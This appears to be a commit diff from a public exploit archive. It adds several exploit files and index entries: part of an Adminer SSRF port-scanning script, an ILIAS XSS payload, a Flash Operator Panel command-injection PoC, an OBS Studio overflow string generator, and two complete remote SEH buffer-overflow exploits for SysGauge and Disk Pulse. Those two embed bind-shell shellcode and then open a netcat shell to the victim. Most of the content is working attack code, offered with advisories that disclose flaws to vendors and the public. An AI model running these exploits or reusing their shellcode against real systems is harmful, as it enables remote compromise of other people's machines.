if RES.find('HTTP/1.1 200 OK')!=-1:
print 'port '+aPort + ' open'
port_lst.append(aPort+' open')
s.close()
break
if RES.find('400 Bad Request')!=-1:
print '400 Bad Request, check params'
s.close()
break
raw_input()
lst=re.findall(r"([^\n<div class='error'>].*connect to MySQL server on.*[^</div>\n])|(Lost connection to MySQL server at.*)|(MySQL server has gone away.*)"+
"|(No connection could be made because the target machine actively refused it.*)|(A connection attempt failed.*)|(HTTP/1.1 200 OK.*)", RES)
if lst:
status=str(lst)
if status.find('connect to MySQL')!=-1:
if PRINT_CLOSED:
print 'port '+ aPort + ' closed'
s.close()
break
elif status.find('machine actively refused it.')!=-1:
if PRINT_CLOSED:
print 'port '+ aPort + ' closed'
s.close()
break
elif status.find('A connection attempt failed')!=-1:
if PRINT_CLOSED:
print 'port '+ aPort + ' closed'
s.close()
break
elif status.find('reading initial communication packet')!=-1:
print 'port '+aPort + ' open'
port_lst.append(aPort+' open')
s.close()
break
elif status.find('MySQL server has gone away')!=-1:
print 'port '+aPort + ' open'
port_lst.append(aPort+' open')
s.close()
break
elif status.find('Bad file descriptor')!=-1:
print 'port '+aPort + ' open'
port_lst.append(aPort+' open')
s.close()
break
elif status.find('Got packets out of order')!=-1:
print 'port '+aPort + ' open'
s.close()
break
except Exception as e:
msg = str(e)
###print msg
if msg.find('timed out')!=-1 and aPort in false_pos_ports:
print 'port '+aPort + ' open'
port_lst.append(aPort+' open')
s.close()
break
elif msg.find('timed out')!=-1:
print 'port '+aPort + ' timed out'
port_lst.append(aPort+' read operation timed out')
s.close()
break
else:
s.close()
break
if port_lst:
log(TARGET)
else:
print "Scan completed, no ports mined."
return 0
def arp(host):
args = "-a" if system_name().lower()=="windows" else "-e"
return subprocess.call("arp " + args + " " + host, shell=True) == 0
def ping_host(host):
args = "-n 1" if system_name().lower()=="windows" else "-c 1"
res=subprocess.call("ping " + args + " " + host, shell=True) == 0
if not res:
print str(host) + ' down? trying ARP'
if not arp(host):
print str(host) + ' unreachable.'
return
return res
def main():
global port_range
print BANNER
greet()
ADMINER_VERSION=False
PRINT_CLOSED=False
USE_SSL=None
ADMINER=raw_input('[+] Adminer Host/IP> ')
if ADMINER=='':
print 'Enter valid Host/IP'
ADMINER=raw_input('[+] Adminer Host/IP> ')
ADMINER_PORT=raw_input('[+] Adminer Port> ')
if not re.search("^\d{1,5}$",ADMINER_PORT):
print 'Enter a valid Port.'
ADMINER_PORT=raw_input('[+] Adminer Port> ')
ADMINER_URI=raw_input('[+] Adminer URI [the adminer-<version>.php OR adminer/ dir path] > ')
TARGET=raw_input('[+] Host/IP to Scan> ')
PORTS_TO_SCAN=raw_input('[+] Port Range e.g. 21-25> ').replace(' ','')
plst=re.findall(r"(\d{1,5})-(\d{1,5})",PORTS_TO_SCAN)
if not plst:
print 'Invalid ports, format is 1-1025'
return
raw_input() #console up
port_range=chk_ports(PORTS_TO_SCAN)
if not port_range:
return
PRINT_CLOSED=raw_input('[+] Print closed ports? 1=Yes any key for No> ')
if PRINT_CLOSED=='1':
PRINT_CLOSED=True
else:
PRINT_CLOSED=False
if not ping_host(ADMINER):
print 'host %s not reachable or blocking ping ' % ADMINER
cont=raw_input('Continue with scan? 1=Yes any key for No> ')
if cont!='1':
print 'Scan aborted.'
raw_input() #console up
return
USE_SSL=use_ssl(ADMINER,ADMINER_PORT)
time.sleep(2)
ADMINER_VERSION = version(ADMINER,ADMINER_PORT,ADMINER_URI,USE_SSL)
if not ADMINER_VERSION:
print "Can't retrieve Adminer script. check supplied URI."
raw_input() #console up
return
else:
if ADMINER_VERSION==504:
raw_input() #console up
return
if scan(ADMINER,int(ADMINER_PORT),ADMINER_URI,TARGET,PORTS_TO_SCAN,PRINT_CLOSED,USE_SSL)==0:
more=raw_input('Info: 1=Yes, any key for No> ')
if more=='1':
info()
raw_input() #console up
if __name__=='__main__':
main()
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: December 16, 2017
Vendor Acknowledgment and reply "I could disallow connecting to well-known ports" : December 18, 2017
Vendor "Adminer throttles invalid login attempts. That should help. I am not sure what else could Adminer do about this."
No more replies from vendor since : December 18, 2017
Attempt contact vendor : January 4, 2018
No more replies (unresponsive).
January 12, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

27
exploits/php/webapps/43595.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Cross Site Scripting in ILIAS CMS 5.2.3
# Date: Apr 24, 2017
# Software Link: https://www.ilias.de
# Exploit Author: Florian Kunushevci
# Contact: https://facebook.com/florianx00
# CVE: CVE-2018-5688
# Category: webapps
1. Description
ILIAS before 5.2.4 has XSS via the cmd parameter to the displayHeader
function in setup/classes/class.ilSetupGUI.php in the Setup component.
2. Proof of Concept
Location : /setup/setup.php
Parameter : ?cmd=
Payload : "><script>alert(1)</script>
3. Solution:
https://www.ilias.de/docu/goto.php?target=lm_1719&client_id=docu
4. References:
https://nvd.nist.gov/vuln/detail/CVE-2018-5688
https://www.ilias.de/docu/goto_docu_pg_75029_35.html

179
exploits/php/webapps/43600.txt Normal file
View file

@ -0,0 +1,179 @@
Document Title:
===============
Flash Operator Panel v2.31.03 - Command Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1907
Release Date:
=============
2018-01-08
Vulnerability Laboratory ID (VL-ID):
====================================
1907
Common Vulnerability Scoring System:
====================================
6.2
Vulnerability Class:
====================
Command Injection
Current Estimated Price:
========================
2.000a! - 3.000a!
Product & Service Introduction:
===============================
The most comprehensive and affordable reporting and realtime monitor package for AsteriskA(c) based Call Centers.
A new approach on getting CDR reports for your phone system, centered on the user and call direction. Top lists,
Usage pattern and real time view are included. This version works under any Linux flavor (i386, x86_64 and R-Pi3).
Versions 1.2, 1.4, 1.6, 1.8, 10, 11 and 12 with the manager interface enabled to asterisk. PHP 5 & MySQL 5: only
required for the visual phonebook, call history and recordings interface.
(Copy of the Vendor Homepage: https://www.fop2.com/index.php )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote command execution in the official Flash Operator Panel v2.31.03.
Vulnerability Disclosure Timeline:
==================================
2018-01-08: Non-Public Disclosure (Vulnerability Laboratory - Shared Customer Research Feed)
Discovery Status:
=================
Published
Affected Product(s):
====================
Nicolas Gudino (Asternic)
Product: Flash Operator Panel 2 - User Control Panel (Web-Application) CentOS 2.31.03, Debian 2.31.03 & RPI-ARM 2.30.03
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A command inject web vulnerability has been discovered in the official Flash Operator Panel v2.31.03 web-application.
The security vulnerability allows remote attackers to inject own system specific commands via web-application.
The command inject web vulnerability is located in the the `command` path variable paramter of the `index.php` file.
Remote attackers with low privileged web-application user account roles are able to perform command requests via
callforward module. Thus allows an user account with restricted privileges to perform unauthorized command requests
to compromise the operator panel web-application. The request method to inject the malicious command to the index path
variable is GET. The attack is limited on exploitation to a restricted authenticated user account of the application.
The security risk of the command injection is estimated as high with a cvss (common vulnerability scoring system) count of 6.2.
Exploitation of the command inject vulnerability requires a low privileged web-application user account and no user interaction.
Successful exploitation of the vulnerability results in web-application-, database management system or web-server -compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] UCP - User Control Panel
Vulnerable File(s):
[+] index.php
Vulnerable Parameter(s):
[+] command
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user interaction and with low privileged user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Exploitation
http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337&module=callforward&command=./&[Variable Command Inject Vulnerability!]
PoC: Vulnerable Source (command)
($_REQUEST['quietmode']) && $user !== false && !empty($user))
(isset($_REQUEST['command']) && ($_REQUEST['command'] == 'login'
$_REQUEST['command'] == 'forgot'
$_REQUEST['command'] == 'reset'))) {
$m = !empty($_REQUEST['module']) ? $_REQUEST['module'] : null;
$ucp->Ajax->doRequest($m,$_REQUEST['command']);
Note: The request can be performed by restricted user accounts of the user control panel for higher access privileges.
The main administrator can use the command parameter to attack the backend of the main administrator by the same method.
The callforward uses the command variable to execute which is the same method performed for basic restricted user accounts.
Reference(s):
http://ucp-fop.localhost:8000/
http://ucp-fop.localhost:8000/ucp/
http://ucp-fop.localhost:8000/ucp/index.php
http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337
http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337&module=callforward
http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337&module=callforward&command
Solution - Fix & Patch:
=======================
The command injection web vulnerability can be patched by a secure approval of the command parameter in the index.php file GET method request.
Sanitize the command path variable and disallow the usage of special chars to prevent further command injection attacks.
Security Risk:
==============
The security risk of the command injection vulnerability via path variable in the web-application is estimated as high (CVSS 6.2).
Credits & Authors:
==================
Benjamin K.M. [bkm@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright A(c) 2018 | Vulnerability Laboratory - [Evolution Security GmbH]aC/
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

32
exploits/windows/dos/43596.py Executable file
View file

@ -0,0 +1,32 @@
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day (SEH Based PoC)
# Date: 2018.01.15
# Exploit Author: Greg Priest
# Version: OBS-Studio-20.1.3
# Tested on: Windows7 x64 HUN/ENG Enterprise
# Software Download Link: https://obsproject.com/download
'''
bug = '''
Vulnerable input field:
<1> Copy printed "AAAAA...." string to clipboard!
<2> Profile -> New
<3> Paste the string in the input then press Ok
'''
junk = "A" * 459
SEH = "BBBB"
nextSEH = "CCCC"
overflow = "D" * 19533
print author
print "String: ", junk + SEH + nextSEH + overflow
print bug

103
exploits/windows/remote/43588.py Executable file
View file

@ -0,0 +1,103 @@
# Exploit Title: SysGauge Server 3.6.18 - Buffer Overflow
# Exploit Author: Ahmad Mahfouz
# Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH
# Contact: http://twitter.com/eln1x
# Date: 12/01/2018
# CVE: CVE-2018-5359
# Version: 3.6.18
# Tested on: Windows 7 x64
# Software Link: hhttp://www.sysgauge.com/setups/sysgaugesrv_setup_v3.6.18.exe
from struct import pack
from os import system
from sys import exit
from time import sleep
import socket
port = 9221
host = '192.168.72.231'
stage1 = "\x83\xc4\x7f" *16 # metasm > add esp,127
stage1 += "\x83\xc4\x04"    # metasm > add esp,4
stage1 +=  "\xff\xe4"       # metasm > jmp esp
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02'
buf =  ""
buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f"
buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b"
buf += "\xaf\xc2\x42\xdf\xfd\xee\x29\x8d\x15\x64\x5f\x1a\x1a"
buf += "\xcd\xea\x7c\x15\xce\x47\xbc\x34\x4c\x9a\x91\x96\x6d"
buf += "\x55\xe4\xd7\xaa\x88\x05\x85\x63\xc6\xb8\x39\x07\x92"
buf += "\x00\xb2\x5b\x32\x01\x27\x2b\x35\x20\xf6\x27\x6c\xe2"
buf += "\xf9\xe4\x04\xab\xe1\xe9\x21\x65\x9a\xda\xde\x74\x4a"
buf += "\x13\x1e\xda\xb3\x9b\xed\x22\xf4\x1c\x0e\x51\x0c\x5f"
buf += "\xb3\x62\xcb\x1d\x6f\xe6\xcf\x86\xe4\x50\x2b\x36\x28"
buf += "\x06\xb8\x34\x85\x4c\xe6\x58\x18\x80\x9d\x65\x91\x27"
buf += "\x71\xec\xe1\x03\x55\xb4\xb2\x2a\xcc\x10\x14\x52\x0e"
buf += "\xfb\xc9\xf6\x45\x16\x1d\x8b\x04\x7f\xd2\xa6\xb6\x7f"
buf += "\x7c\xb0\xc5\x4d\x23\x6a\x41\xfe\xac\xb4\x96\x01\x87"
buf += "\x01\x08\xfc\x28\x72\x01\x3b\x7c\x22\x39\xea\xfd\xa9"
buf += "\xb9\x13\x28\x47\xb1\xb2\x83\x7a\x3c\x04\x74\x3b\xee"
buf += "\xed\x9e\xb4\xd1\x0e\xa1\x1e\x7a\xa6\x5c\xa1\x81\x0e"
buf += "\xe8\x47\xe3\x60\xbc\xd0\x9b\x42\x9b\xe8\x3c\xbc\xc9"
buf += "\x40\xaa\xf5\x1b\x56\xd5\x05\x0e\xf0\x41\x8e\x5d\xc4"
buf += "\x70\x91\x4b\x6c\xe5\x06\x01\xfd\x44\xb6\x16\xd4\x3e"
buf += "\x5b\x84\xb3\xbe\x12\xb5\x6b\xe9\x73\x0b\x62\x7f\x6e"
buf += "\x32\xdc\x9d\x73\xa2\x27\x25\xa8\x17\xa9\xa4\x3d\x23"
buf += "\x8d\xb6\xfb\xac\x89\xe2\x53\xfb\x47\x5c\x12\x55\x26"
buf += "\x36\xcc\x0a\xe0\xde\x89\x60\x33\x98\x95\xac\xc5\x44"
buf += "\x27\x19\x90\x7b\x88\xcd\x14\x04\xf4\x6d\xda\xdf\xbc"
buf += "\x9e\x91\x7d\x94\x36\x7c\x14\xa4\x5a\x7f\xc3\xeb\x62"
buf += "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f"
buf += "\x7d\x58\x6e\x5a"
shellcode = buf
payload = 'A' * 124             #offset
payload +=  '\xeb\x12\x90\x90'  #jmp over seh retrun value
payload += '\x3b\x38\x01\x10' * 4   # 0x1001383b : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [libdsm.dll]
payload += stage1
payload +=  '\x90' * (1000 - len(payload) - len(shellcode))
payload += shellcode
header = '\x75\x19\xba\xab'
header += '\x03\x00\x00\x00'
header += '\x00\x40\x00\x00'
header += pack('<I', len(payload))
header += pack('<I', len(payload))
header += pack('<I', ord(payload[-1]))
packet = header
packet += payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "[*] Testing connection to tatget %s:%s" %(host,port)
    s.connect((host, port))
except:
    print "[-] Unable to communicate to target %s:%s" %(host,port)
    exit()
s.send(packet)
print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:1337 .." %host
sleep(3)
system("nc %s 1337"%host)

103
exploits/windows/remote/43589.py Executable file
View file

@ -0,0 +1,103 @@
# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow
# Exploit Author: Ahmad Mahfouz
# Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH
# Contact: http://twitter.com/eln1x
# Date: 12/01/2018
# CVE: CVE-2017-15663
# Version: v10.1.18
# Tested on: Windows 7 x64
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe
from struct import pack
from os import system
from sys import exit
from time import sleep
import socket
port = 9120
host = '192.168.72.231'
stage1 = "\x83\xc4\x7f" *17 # metasm > add esp,127
stage1 += "\x83\xc4\x04"    # metasm > add esp,4
stage1 +=  "\xff\xe4"       # metasm > jmp esp
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02'
buf =  "\x90" * 10
buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f"
buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b"
buf += "\xaf\xc2\x42\xdf\xfd\xee\x29\x8d\x15\x64\x5f\x1a\x1a"
buf += "\xcd\xea\x7c\x15\xce\x47\xbc\x34\x4c\x9a\x91\x96\x6d"
buf += "\x55\xe4\xd7\xaa\x88\x05\x85\x63\xc6\xb8\x39\x07\x92"
buf += "\x00\xb2\x5b\x32\x01\x27\x2b\x35\x20\xf6\x27\x6c\xe2"
buf += "\xf9\xe4\x04\xab\xe1\xe9\x21\x65\x9a\xda\xde\x74\x4a"
buf += "\x13\x1e\xda\xb3\x9b\xed\x22\xf4\x1c\x0e\x51\x0c\x5f"
buf += "\xb3\x62\xcb\x1d\x6f\xe6\xcf\x86\xe4\x50\x2b\x36\x28"
buf += "\x06\xb8\x34\x85\x4c\xe6\x58\x18\x80\x9d\x65\x91\x27"
buf += "\x71\xec\xe1\x03\x55\xb4\xb2\x2a\xcc\x10\x14\x52\x0e"
buf += "\xfb\xc9\xf6\x45\x16\x1d\x8b\x04\x7f\xd2\xa6\xb6\x7f"
buf += "\x7c\xb0\xc5\x4d\x23\x6a\x41\xfe\xac\xb4\x96\x01\x87"
buf += "\x01\x08\xfc\x28\x72\x01\x3b\x7c\x22\x39\xea\xfd\xa9"
buf += "\xb9\x13\x28\x47\xb1\xb2\x83\x7a\x3c\x04\x74\x3b\xee"
buf += "\xed\x9e\xb4\xd1\x0e\xa1\x1e\x7a\xa6\x5c\xa1\x81\x0e"
buf += "\xe8\x47\xe3\x60\xbc\xd0\x9b\x42\x9b\xe8\x3c\xbc\xc9"
buf += "\x40\xaa\xf5\x1b\x56\xd5\x05\x0e\xf0\x41\x8e\x5d\xc4"
buf += "\x70\x91\x4b\x6c\xe5\x06\x01\xfd\x44\xb6\x16\xd4\x3e"
buf += "\x5b\x84\xb3\xbe\x12\xb5\x6b\xe9\x73\x0b\x62\x7f\x6e"
buf += "\x32\xdc\x9d\x73\xa2\x27\x25\xa8\x17\xa9\xa4\x3d\x23"
buf += "\x8d\xb6\xfb\xac\x89\xe2\x53\xfb\x47\x5c\x12\x55\x26"
buf += "\x36\xcc\x0a\xe0\xde\x89\x60\x33\x98\x95\xac\xc5\x44"
buf += "\x27\x19\x90\x7b\x88\xcd\x14\x04\xf4\x6d\xda\xdf\xbc"
buf += "\x9e\x91\x7d\x94\x36\x7c\x14\xa4\x5a\x7f\xc3\xeb\x62"
buf += "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f"
buf += "\x7d\x58\x6e\x5a"
shellcode = buf
payload = 'A' * 124             #offset
payload +=  '\xeb\x09\x90\x90'  #jmp over seh retrun value
payload +=  '\xcd\x89\x06\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 |  {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\Disk Pulse Enterprise\bin\libspp.dll)
payload += stage1
payload +=  '\x90' * (1000 - len(payload) - len(shellcode))
payload += shellcode
header = '\x75\x19\xba\xab'
header += '\x03\x00\x00\x00'
header += '\x00\x40\x00\x00'
header += pack('<I', len(payload))
header += pack('<I', len(payload))
header += pack('<I', ord(payload[-1]))
packet = header
packet += payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "[*] Testing connection to tatget %s:%s" %(host,port)
    s.connect((host, port))
except:
    print "[-] Unable to communicate to target %s:%s" %(host,port)
    exit()
s.send(packet)
print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:1337 .." %host
sleep(3)
system("nc %s 1337"%host)

16
files_exploits.csv
View file

@ -5247,6 +5247,7 @@ id,file,description,date,author,type,platform,port
40515,exploits/android/dos/40515.txt,"Google Android - Binder Generic ASLR Leak",2016-10-12,"Google Security Research",dos,android,
40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",2016-10-13,"Antonio Z.",dos,osx,
40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",dos,windows,
43596,exploits/windows/dos/43596.py,"OBS studio 20.1.3 - Local Buffer Overflow",2018-01-15,ScrR1pTK1dd13,dos,windows,
40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows,
@ -9267,7 +9268,7 @@ id,file,description,date,author,type,platform,port
43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
43397,exploits/bsd/local/43397.md,"Sony Playstation 4 4.05 FW - Local Kernel Loader",2017-12-27,Specter,local,bsd,
43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux,
43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Privilege Escalation",2018-01-03,mr_me,local,windows,
43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows,
43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
43449,exploits/linux/local/43449.rb,"VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)",2018-01-05,Metasploit,local,linux,
43465,exploits/windows/local/43465.txt,"Microsoft Windows - Local XPS Print Spooler Sandbox Escape",2018-01-08,"Google Security Research",local,windows,
@ -15809,6 +15810,9 @@ id,file,description,date,author,type,platform,port
40474,exploits/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",remote,hardware,
40491,exploits/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,remote,multiple,
40507,exploits/linux/remote/40507.py,"Subversion 1.6.6/1.6.12 - Code Execution",2016-10-12,GlacierZ0ne,remote,linux,
43588,exploits/windows/remote/43588.py,"SysGauge Server 3.6.18 - Buffer Overflow",2018-01-15,"Ahmad Mahfouz",remote,windows,
43589,exploits/windows/remote/43589.py,"Disk Pulse Enterprise 10.1.18 - Buffer Overflow",2018-01-15,"Ahmad Mahfouz",remote,windows,
43609,exploits/hardware/remote/43609.py,"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution",2018-01-15,mr_me,remote,hardware,
40561,exploits/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,remote,multiple,
40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,
40609,exploits/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,remote,linux,1471
@ -37148,6 +37152,15 @@ id,file,description,date,author,type,platform,port
40531,exploits/php/webapps/40531.txt,"Simple Forum PHP 2.4 - SQL Injection",2016-10-14,"Ehsan Hosseini",webapps,php,
40532,exploits/php/webapps/40532.html,"Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)",2016-10-14,"Ehsan Hosseini",webapps,php,
40534,exploits/php/webapps/40534.html,"YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-14,"Arbin Godar",webapps,php,
43567,exploits/php/webapps/43567.txt,"ImgHosting 1.5 - Cross-Site Scripting",2018-01-15,"Dennis Veninga",webapps,php,
43569,exploits/php/webapps/43569.txt,"Domains & Hostings Manager PRO 3.0 - Authentication Bypass",2018-01-15,Tauco,webapps,php,
43590,exploits/php/webapps/43590.txt,"PerfexCRM 1.9.7 - Arbitrary File Upload",2018-01-15,"Ahmad Mahfouz",webapps,php,
43591,exploits/php/webapps/43591.txt,"RISE 1.9 - 'search' SQL Injection",2018-01-15,"Ahmad Mahfouz",webapps,php,
43592,exploits/jsp/webapps/43592.txt,"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect",2018-01-15,"Andrew Gill",webapps,jsp,
43593,exploits/php/webapps/43593.py,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php,
43594,exploits/java/webapps/43594.txt,"Oracle PeopleSoft 8.5x - Remote Code Execution",2018-01-15,"Vahagn Vardanyan",webapps,java,
43595,exploits/php/webapps/43595.txt,"ILIAS < 5.2.4 - Cross-Site Scripting",2018-01-15,"Florian Kunushevci",webapps,php,
43600,exploits/php/webapps/43600.txt,"Flash Operator Panel 2.31.03 - Command Execution",2018-01-15,Vulnerability-Lab,webapps,php,80
40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,
40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
@ -37768,6 +37781,7 @@ id,file,description,date,author,type,platform,port
43496,exploits/hardware/webapps/43496.py,"D-Link Routers 110/412/615/815 < 1.03 - 'service.cgi' Arbitrary Code Execution",2018-01-10,Cr0n1c,webapps,hardware,
43535,exploits/php/webapps/43535.txt,"Xnami 1.0 - Cross-Site Scripting",2018-01-12,"Dennis Veninga",webapps,php,
43543,exploits/php/webapps/43543.txt,"Taxi Booking Script 1.0 - Cross-site Scripting",2018-01-12,Tauco,webapps,php,
43560,exploits/php/webapps/43560.py,"pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection",2018-01-15,absolomb,webapps,php,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,

Can't render this file because it is too large.

313
files_shellcodes.csv
View file

@ -1,33 +1,33 @@
id,file,description,date,author,type,platform
14113,shellcodes/arm/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
13241,shellcodes/aix/13241.c,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind TCP (31337/TCP) Shell Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
